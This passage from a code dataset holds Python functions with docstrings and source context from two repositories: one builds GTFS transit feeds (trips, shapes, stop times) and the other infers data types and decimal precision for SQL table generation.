Given a GeoDataFrame of stops on one side of a given Shapely
LineString with given shape ID, compute distances and departure
times of a trip traversing the LineString from start to end
at the given start and end times (in seconds past midnight)
and stopping at the stops encountered along the way.
Do not assume that the stops are ordered by trip encounter.
Return three lists of the same length: the stop IDs in order
that the trip encounters them, the shape distances traveled
along distances at the stops, and the times the stops are
encountered, respectively.
"""
g = geo_stops.copy()
dists_and_stops = []
for i, stop in enumerate(g['stop_id'].values):
if stop in dist_by_stop_by_shape[shape]:
d = dist_by_stop_by_shape[shape][stop]
else:
d = gt.get_segment_length(linestring,
g.geometry.iat[i])/1000 # km
dist_by_stop_by_shape[shape][stop] = d
dists_and_stops.append((d, stop))
dists, stops = zip(*sorted(dists_and_stops))
D = linestring.length/1000
dists_are_reasonable = all([d < D + 100 for d in dists])
if not dists_are_reasonable:
# Assume equal distances between stops :-(
n = len(stops)
delta = D/(n - 1)
dists = [i*delta for i in range(n)]
# Compute times using distances, start and end stop times,
# and linear interpolation
t0, t1 = start_time, end_time
d0, d1 = dists[0], dists[-1]
# Interpolate
times = np.interp(dists, [d0, d1], [t0, t1])
return stops, dists, times
# Iterate through trips and set stop times based on stop ID
# and service window frequency.
# Remember that every trip has a valid shape ID.
# Gather stops geographically from ``stops``.
rows = []
geo_stops = gt.geometrize_stops(stops, use_utm=True)
# Look on the side of the traffic side of street for this timezone
side = cs.traffic_by_timezone[pfeed.meta.agency_timezone.iat[0]]
for index, row in trips.iterrows():
shape = row['shape_id']
geom = geometry_by_shape[shape]
stops = get_nearby_stops(geo_stops, geom, side, buffer=buffer)
# Don't make stop times for trips without nearby stops
if stops.empty:
continue
length = geom.length/1000 # km
speed = row['speed'] # km/h
duration = int((length/speed)*3600) # seconds
frequency = row['frequency']
if not frequency:
# No stop times for this trip/frequency combo
continue
headway = 3600/frequency # seconds
trip = row['trip_id']
__, route, window, base_timestr, direction, i = (
trip.split(cs.SEP))
direction = int(direction)
base_time = gt.timestr_to_seconds(base_timestr)
start_time = base_time + headway*int(i)
end_time = start_time + duration
stops, dists, times = compute_stops_dists_times(stops, geom, shape,
start_time, end_time)
new_rows = [[trip, stop, j, time, time, dist]
for j, (stop, time, dist) in enumerate(zip(stops, times, dists))]
rows.extend(new_rows)
g = pd.DataFrame(rows, columns=['trip_id', 'stop_id', 'stop_sequence',
'arrival_time', 'departure_time', 'shape_dist_traveled'])
# Convert seconds back to time strings
g[['arrival_time', 'departure_time']] =\
g[['arrival_time', 'departure_time']].applymap(
lambda x: gt.timestr_to_seconds(x, inverse=True))
return g | Given a ProtoFeed and its corresponding routes (DataFrame),
shapes (DataFrame), stops (DataFrame), trips (DataFrame),
return DataFrame representing ``stop_times.txt``.
Includes the optional ``shape_dist_traveled`` column.
Don't make stop times for trips with no nearby stops. | train | https://github.com/mrcagney/make_gtfs/blob/37b6f88e03bac708c2e85d6f4b6d48a0c92e4a59/make_gtfs/main.py#L268-L384 | [
"def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):\n \"\"\"\n Given a GeoDataFrame of stops, a Shapely LineString in the\n same coordinate system, a side of the LineString\n (string; 'left' = left hand side of LineString,\n 'right' = right hand side of LineString, or\n 'both' = ... | import pandas as pd
import numpy as np
import shapely.ops as so
import shapely.geometry as sg
import gtfstk as gt
from . import constants as cs
def get_duration(timestr1, timestr2, units='s'):
    """
    Return the length of the time period from ``timestr1`` to
    ``timestr2`` in the given units ('s' seconds, 'min' minutes,
    'h' hours).  Assumes ``timestr1 < timestr2``.
    """
    valid_units = ['s', 'min', 'h']
    assert units in valid_units,\
        "Units must be one of {!s}".format(valid_units)
    # Difference in seconds, then scale to the requested units
    seconds = gt.timestr_to_seconds(timestr2) - gt.timestr_to_seconds(timestr1)
    if units == 'min':
        return seconds/60
    if units == 'h':
        return seconds/3600
    return seconds
def build_stop_ids(shape_id):
    """
    Return the pair of stop IDs (one per shape endpoint) derived from
    the given shape ID.
    """
    prefix = cs.SEP.join(['stp', shape_id])
    return [prefix + cs.SEP + str(i) for i in (0, 1)]
def build_stop_names(shape_id):
    """
    Return the pair of human-readable stop names (one per shape
    endpoint) derived from the given shape ID.
    """
    names = []
    for i in (0, 1):
        names.append('Stop {!s} on shape {!s} '.format(i, shape_id))
    return names
def build_agency(pfeed):
    """
    Return a one-row DataFrame representing ``agency.txt``, taking the
    agency name, URL, and timezone from the first row of ``pfeed.meta``.
    """
    meta = pfeed.meta
    # Pull the first value of each required agency column
    record = {
        col: meta[col].iat[0]
        for col in ['agency_name', 'agency_url', 'agency_timezone']
    }
    return pd.DataFrame(record, index=[0])
def build_calendar_etc(pfeed):
    """
    Given a ProtoFeed, return a DataFrame representing ``calendar.txt``
    and a dictionary of the form <service window ID> -> <service ID>,
    respectively.
    """
    windows = pfeed.service_windows.copy()
    # Create a service ID for each distinct days_active field and map the
    # service windows to those service IDs
    def get_sid(bitlist):
        # e.g. [1,1,1,1,1,0,0] -> 'srv1111100'; identical weekday
        # patterns therefore share one service ID
        return 'srv' + ''.join([str(b) for b in bitlist])
    weekdays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
        'saturday', 'sunday']
    bitlists = set()
    # Create a dictionary <service window ID> -> <service ID>
    d = dict()
    for index, window in windows.iterrows():
        bitlist = window[weekdays].tolist()
        d[window['service_window_id']] = get_sid(bitlist)
        bitlists.add(tuple(bitlist))
    service_by_window = d
    # Create calendar: one row per distinct weekday pattern, all rows
    # sharing the feed-wide start and end dates.
    # NOTE: row order follows set iteration order, so it is arbitrary.
    start_date = pfeed.meta['start_date'].iat[0]
    end_date = pfeed.meta['end_date'].iat[0]
    F = []
    for bitlist in bitlists:
        F.append([get_sid(bitlist)] + list(bitlist) +
            [start_date, end_date])
    calendar = pd.DataFrame(F, columns=(
        ['service_id'] + weekdays + ['start_date', 'end_date']))
    return calendar, service_by_window
def build_routes(pfeed):
    """
    Return a DataFrame representing ``routes.txt`` built from the
    distinct route rows of ``pfeed.frequencies``; route IDs are the
    short names prefixed with 'r'.
    """
    cols = ['route_short_name', 'route_long_name', 'route_type', 'shape_id']
    routes = pfeed.frequencies[cols].drop_duplicates().copy()
    # Derive route IDs from the short names
    routes['route_id'] = 'r' + routes['route_short_name'].map(str)
    # shape_id was only needed for de-duplication
    return routes.drop(columns=['shape_id'])
def build_shapes(pfeed):
    """
    Given a ProtoFeed, return a DataFrame representing ``shapes.txt``
    with columns shape_id, shape_pt_sequence, shape_pt_lon,
    shape_pt_lat.

    Only use shape IDs that occur in both ``pfeed.shapes`` and
    ``pfeed.frequencies`` (the latter recorded in
    ``pfeed.shapes_extra``).  Create reversed shapes where routes
    traverse shapes in both directions.
    """
    rows = []
    for shape, geom in pfeed.shapes[['shape_id',
        'geometry']].itertuples(index=False):
        if shape not in pfeed.shapes_extra:
            # Shape is not referenced by any frequency row
            continue
        if pfeed.shapes_extra[shape] == 2:
            # Route traverses the shape in both directions: emit the
            # forward shape (direction 1) and its coordinate-reversed
            # twin (direction 0).
            # Fix: use cs.SEP when composing the direction suffix so the
            # IDs match those built in ``build_trips``; previously '-'
            # was hard-coded here, which silently breaks if cs.SEP is
            # ever changed.
            shid = '{}{}{}'.format(shape, cs.SEP, 1)
            new_rows = [[shid, i, lon, lat]
                for i, (lon, lat) in enumerate(geom.coords)]
            rows.extend(new_rows)
            shid = '{}{}{}'.format(shape, cs.SEP, 0)
            new_rows = [[shid, i, lon, lat]
                for i, (lon, lat) in enumerate(reversed(geom.coords))]
            rows.extend(new_rows)
        else:
            # One direction only: tag the shape ID with that direction
            shid = '{}{}{}'.format(shape, cs.SEP, pfeed.shapes_extra[shape])
            new_rows = [[shid, i, lon, lat]
                for i, (lon, lat) in enumerate(geom.coords)]
            rows.extend(new_rows)
    return pd.DataFrame(rows, columns=['shape_id', 'shape_pt_sequence',
        'shape_pt_lon', 'shape_pt_lat'])
def build_stops(pfeed, shapes=None):
    """
    Given a ProtoFeed, return a DataFrame representing ``stops.txt``.
    If ``pfeed.stops`` is not ``None``, then return that.
    Otherwise, require built shapes output by :func:`build_shapes`,
    create one stop at the beginning (the first point) of each shape
    and one at the end (the last point) of each shape,
    and drop stops with duplicate coordinates.
    Note that this will yield one stop for shapes that are loops.
    """
    if pfeed.stops is not None:
        # User supplied stops explicitly; use them as-is
        stops = pfeed.stops.copy()
    else:
        if shapes is None:
            raise ValueError('Must input shapes built by build_shapes()')
        geo_shapes = gt.geometrize_shapes(shapes)
        rows = []
        for shape, geom in geo_shapes[['shape_id',
            'geometry']].itertuples(index=False):
            stop_ids = build_stop_ids(shape)
            stop_names = build_stop_names(shape)
            for i in range(2):
                stop_id = stop_ids[i]
                stop_name = stop_names[i]
                # interpolate(0/1, normalized=True) yields the first and
                # last point of the shape, respectively
                stop_lon, stop_lat = geom.interpolate(i,
                    normalized=True).coords[0]
                rows.append([stop_id, stop_name, stop_lon, stop_lat])
        stops = (
            pd.DataFrame(rows, columns=['stop_id', 'stop_name',
                'stop_lon', 'stop_lat'])
            # Coincident endpoints (e.g. loop shapes) collapse to one stop
            .drop_duplicates(subset=['stop_lon', 'stop_lat'])
        )
    return stops
def build_trips(pfeed, routes, service_by_window):
    """
    Given a ProtoFeed and its corresponding routes (DataFrame),
    service-by-window (dictionary), return a DataFrame representing
    ``trips.txt``.
    Trip IDs encode route, direction, and service window information
    to make it easy to compute stop times later.
    """
    # Put together the route and service data
    routes = pd.merge(routes[['route_id', 'route_short_name']],
        pfeed.frequencies)
    routes = pd.merge(routes, pfeed.service_windows)
    # For each row in routes, add trips at the specified frequency in
    # the specified direction
    rows = []
    for index, row in routes.iterrows():
        shape = row['shape_id']
        route = row['route_id']
        window = row['service_window_id']
        start, end = row[['start_time', 'end_time']].values
        duration = get_duration(start, end, 'h')
        frequency = row['frequency']  # trips per hour
        if not frequency:
            # No trips during this service window
            continue
        # Rounding down occurs here if the duration isn't integral
        # (bad input)
        num_trips_per_direction = int(frequency*duration)
        service = service_by_window[window]
        direction = row['direction']
        # direction == 2 means the route runs both ways on this shape
        if direction == 2:
            directions = [0, 1]
        else:
            directions = [direction]
        for direction in directions:
            # Warning: this shape-ID-making logic needs to match that
            # in ``build_shapes``
            shid = '{}{}{}'.format(shape, cs.SEP, direction)
            # Trip ID format:
            # t<SEP>route<SEP>window<SEP>start<SEP>direction<SEP>index;
            # ``build_stop_times`` later splits it on cs.SEP.
            rows.extend([[
                route,
                cs.SEP.join(['t', route, window, start,
                    str(direction), str(i)]),
                direction,
                shid,
                service
            ] for i in range(num_trips_per_direction)])
    return pd.DataFrame(rows, columns=['route_id', 'trip_id', 'direction_id',
        'shape_id', 'service_id'])
def buffer_side(linestring, side, buffer):
    """
    Given a Shapely LineString, a side of the LineString
    (string; 'left' = left hand side of LineString,
    'right' = right hand side of LineString, or
    'both' = both sides), and a buffer size in the distance units of
    the LineString, buffer the LineString on the given side by
    the buffer size and return the resulting Shapely polygon.
    """
    # Full two-sided buffer with flat caps
    b = linestring.buffer(buffer, cap_style=2)
    if side in ['left', 'right'] and buffer > 0:
        # Make a tiny buffer to split the normal-size buffer
        # in half across the linestring
        eps = min(buffer/2, 0.001)
        b0 = linestring.buffer(eps, cap_style=3)
        diff = b.difference(b0)
        polys = so.polygonize(diff)
        # Buffer sides slightly to include original linestring
        # NOTE(review): this relies on so.polygonize yielding the
        # left-hand polygon first and the right-hand one last; that
        # ordering is not documented as stable — confirm.
        if side == 'left':
            b = list(polys)[0].buffer(1.1*eps)
        else:
            b = list(polys)[-1].buffer(1.1*eps)
    return b
def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):
    """
    Return the subset of ``geo_stops`` (a GeoDataFrame) lying within
    ``buffer`` distance units of the given ``side`` ('left', 'right',
    or 'both') of ``linestring``, which must be in the same coordinate
    system as the stops.
    """
    # Build the search zone on the requested side, then keep the stops
    # that intersect it
    zone = buffer_side(linestring, side, buffer)
    hits = geo_stops.intersects(zone)
    return geo_stops.loc[hits].copy()
def build_feed(pfeed, buffer=cs.BUFFER):
    """
    Convert the given ProtoFeed into a gtfstk Feed with distance units
    in kilometers.  ``buffer`` is forwarded to ``build_stop_times`` and
    controls how far from a shape a stop may lie and still be served by
    trips on that shape.
    """
    # Create Feed tables
    agency = build_agency(pfeed)
    calendar, service_by_window = build_calendar_etc(pfeed)
    routes = build_routes(pfeed)
    shapes = build_shapes(pfeed)
    stops = build_stops(pfeed, shapes)
    trips = build_trips(pfeed, routes, service_by_window)
    stop_times = build_stop_times(pfeed, routes, shapes, stops, trips,
        buffer=buffer)
    # Be tidy and remove unused stops
    stops = stops[stops.stop_id.isin(stop_times.stop_id)].copy()
    # Create Feed
    return gt.Feed(agency=agency, calendar=calendar, routes=routes,
        shapes=shapes, stops=stops, stop_times=stop_times, trips=trips,
        dist_units='km')
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | precision_and_scale | python | def precision_and_scale(x):
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale) | From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L17-L47 | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
    """
    Return True for values treated as scalars: anything string-like
    (has a ``lower`` method) or non-iterable.
    """
    looks_like_string = hasattr(x, 'lower')
    iterable = hasattr(x, '__iter__')
    return looks_like_string or not iterable
# Heuristics shared by the coercion helpers:
# _complex_enough_to_be_date matches date-ish separators (- . space /);
# _digits_only matches strings consisting solely of digits.
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
    """
    Coerce ``datum`` to the most specific data type possible.

    Order of preference: datetime, boolean, integer, decimal, float,
    string.  ``None`` passes through unchanged.

    >>> coerce_to_specific('-000000001854.60')
    Decimal('-1854.60')
    >>> coerce_to_specific(7.2)
    Decimal('7.2')
    >>> coerce_to_specific("Jan 17 2012")
    datetime.datetime(2012, 1, 17, 0, 0)
    >>> coerce_to_specific("something else")
    'something else'
    >>> coerce_to_specific("20141010")
    datetime.datetime(2014, 10, 10, 0, 0)
    >>> coerce_to_specific("001210107")
    1210107
    >>> coerce_to_specific("010")
    10
    """
    if datum is None:
        return None
    try:
        result = dateutil.parser.parse(datum)
        # dateutil's parser is very aggressive, so a successful parse
        # may still not be a real date.  Each guard below raises to
        # bail out of the date branch on a suspected false positive.
        # Check for a nonsense unprintable date.
        str(result)
        clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
        if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
            # Too few date-like separators: accept only all-digit
            # strings whose length matches a compact date/datetime
            # format (e.g. YYYYMMDD).
            digits = _digits_only.search(clean_datum)
            if (not digits) or (len(digits.group(0)) not in
                (4, 6, 8, 12, 14, 17)):
                raise Exception("false date hit for %s" % datum)
        # Most false date hits are interpreted as times today
        # or as unlikely far-future or far-past years.
        if result.date() == datetime.datetime.now().date():
            raise Exception("false date hit (%s) for %s" % (
                str(result), datum))
        if not (1700 < result.year < 2150):
            raise Exception("false date hit (%s) for %s" % (
                str(result), datum))
        return result
    except Exception:
        # Fix: drop the unused ``as e`` binding; not a date, so fall
        # through to the other coercions.
        pass
    # Hoist the normalized form used by both boolean checks.
    lowered = str(datum).strip().lower()
    if lowered in ('0', 'false', 'f', 'n', 'no'):
        return False
    elif lowered in ('1', 'true', 't', 'y', 'yes'):
        return True
    try:
        return int(str(datum))
    except ValueError:
        pass
    try:
        return Decimal(str(datum))
    except InvalidOperation:
        pass
    try:
        return float(str(datum))
    except ValueError:
        pass
    return str(datum)
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def worst_decimal(d1, d2):
    """
    Return a 9-filled Decimal with enough integer digits and enough
    fractional digits (scale) to accommodate numbers like either
    ``d1`` or ``d2``.

    >>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
    Decimal('999.999')
    """
    before1, after1 = _places_b4_and_after_decimal(d1)
    before2, after2 = _places_b4_and_after_decimal(d2)
    whole = '9' * max(before1, before2)
    frac = '9' * max(after1, after2)
    return Decimal(whole + '.' + frac)
def set_worst(old_worst, new_worst):
    """
    Pad new_worst with zeroes to prevent it being shorter than old_worst.
    >>> set_worst(311920, '48-49')
    '48-490'
    >>> set_worst(98, -2)
    -20
    """
    # Booleans pass through untouched
    if isinstance(new_worst, bool):
        return new_worst
    # Negative numbers confuse the length calculation.
    negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
        (hasattr(new_worst, '__neg__') and new_worst < 0) )
    # Strip signs for the length comparison; strings raise TypeError
    # on abs() and are left as-is
    try:
        old_worst = abs(old_worst)
        new_worst = abs(new_worst)
    except TypeError:
        pass
    # now go by length
    new_len = len(str(new_worst))
    old_len = len(str(old_worst))
    if new_len < old_len:
        # Right-pad with zeroes and convert back to the original type
        new_type = type(new_worst)
        new_worst = str(new_worst).ljust(old_len, '0')
        new_worst = new_type(new_worst)
    # now put the removed negative back
    if negative:
        try:
            new_worst = -1 * abs(new_worst)
        # NOTE(review): bare except silently ignores any failure here
        # (e.g. non-numeric new_worst); consider narrowing to TypeError.
        except:
            pass
    return new_worst
def best_representative(d1, d2):
    """
    Given two objects each coerced to the most specific type possible, return the one
    of the least restrictive type.
    >>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
    Decimal('-99.9999')
    >>> best_representative(None, Decimal('6.1'))
    Decimal('6.1')
    >>> best_representative(311920, '48-49')
    '48-490'
    >>> best_representative(6, 'foo')
    'foo'
    >>> best_representative(Decimal('4.95'), Decimal('6.1'))
    Decimal('9.99')
    >>> best_representative(Decimal('-1.9'), Decimal('6.1'))
    Decimal('-9.9')
    """
    # Blank strings and None defer to the other value
    if hasattr(d2, 'strip') and not d2.strip():
        return d1
    if d1 is None:
        return d2
    elif d2 is None:
        return d1
    # Lower index = more specific type; keep the least specific
    preference = (datetime.datetime, bool, int, Decimal, float, str)
    worst_pref = 0
    worst = ''
    for coerced in (d1, d2):
        pref = preference.index(type(coerced))
        if pref > worst_pref:
            worst_pref = pref
            worst = set_worst(worst, coerced)
        elif pref == worst_pref:
            # Same specificity: widen to cover both values
            if isinstance(coerced, Decimal):
                worst = set_worst(worst, worst_decimal(coerced, worst))
            elif isinstance(coerced, float):
                worst = set_worst(worst, max(coerced, worst))
            else: # int, str
                if len(str(coerced)) > len(str(worst)):
                    worst = set_worst(worst, coerced)
    return worst
def best_coercable(data):
    """
    Given an iterable of scalar data, returns the datum representing the most specific
    data type the list overall can be coerced into, preferring datetimes, then bools,
    then integers, then decimals, then floats, then strings.
    >>> best_coercable((6, '2', 9))
    6
    >>> best_coercable((Decimal('6.1'), 2, 9))
    Decimal('6.1')
    >>> best_coercable(('2014 jun 7', '2011 may 2'))
    datetime.datetime(2014, 6, 7, 0, 0)
    >>> best_coercable((7, 21.4, 'ruining everything'))
    'ruining everything'
    """
    # Lower index = more specific type; track the least specific seen
    preference = (datetime.datetime, bool, int, Decimal, float, str)
    worst_pref = 0
    worst = ''
    for datum in data:
        coerced = coerce_to_specific(datum)
        pref = preference.index(type(coerced))
        if pref > worst_pref:
            worst_pref = pref
            worst = coerced
        elif pref == worst_pref:
            # Same specificity: widen to cover both values
            if isinstance(coerced, Decimal):
                worst = worst_decimal(coerced, worst)
            elif isinstance(coerced, float):
                worst = max(coerced, worst)
            else: # int, str
                if len(str(coerced)) > len(str(worst)):
                    worst = coerced
    return worst
def sqla_datatype_for(datum):
    """
    Given a scalar Python value, picks an appropriate SQLAlchemy data type.
    >>> sqla_datatype_for(7.2)
    DECIMAL(precision=2, scale=1)
    >>> sqla_datatype_for("Jan 17 2012")
    <class 'sqlalchemy.sql.sqltypes.DATETIME'>
    >>> sqla_datatype_for("something else")
    Unicode(length=14)
    """
    # Date check: require at least two date-like separators before
    # trusting dateutil's aggressive parser
    try:
        if len(_complex_enough_to_be_date.findall(datum)) > 1:
            dateutil.parser.parse(datum)
            return sa.DATETIME
    # TypeError covers non-string datum; ValueError covers parse failure
    except (TypeError, ValueError):
        pass
    # Numeric check: TypeError from precision_and_scale means the value
    # is not numeric, so fall back to a Unicode column sized to fit
    try:
        (prec, scale) = precision_and_scale(datum)
        return sa.DECIMAL(prec, scale)
    except TypeError:
        return sa.Unicode(len(datum))
# Run the module's doctests when executed directly.
if __name__ == '__main__':
    doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | coerce_to_specific | python | def coerce_to_specific(datum):
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum) | Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10 | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L51-L112 | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def worst_decimal(d1, d2):
"""
Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999')
"""
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst
def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | _places_b4_and_after_decimal | python | def _places_b4_and_after_decimal(d):
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0)) | >>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3) | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L114-L120 | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
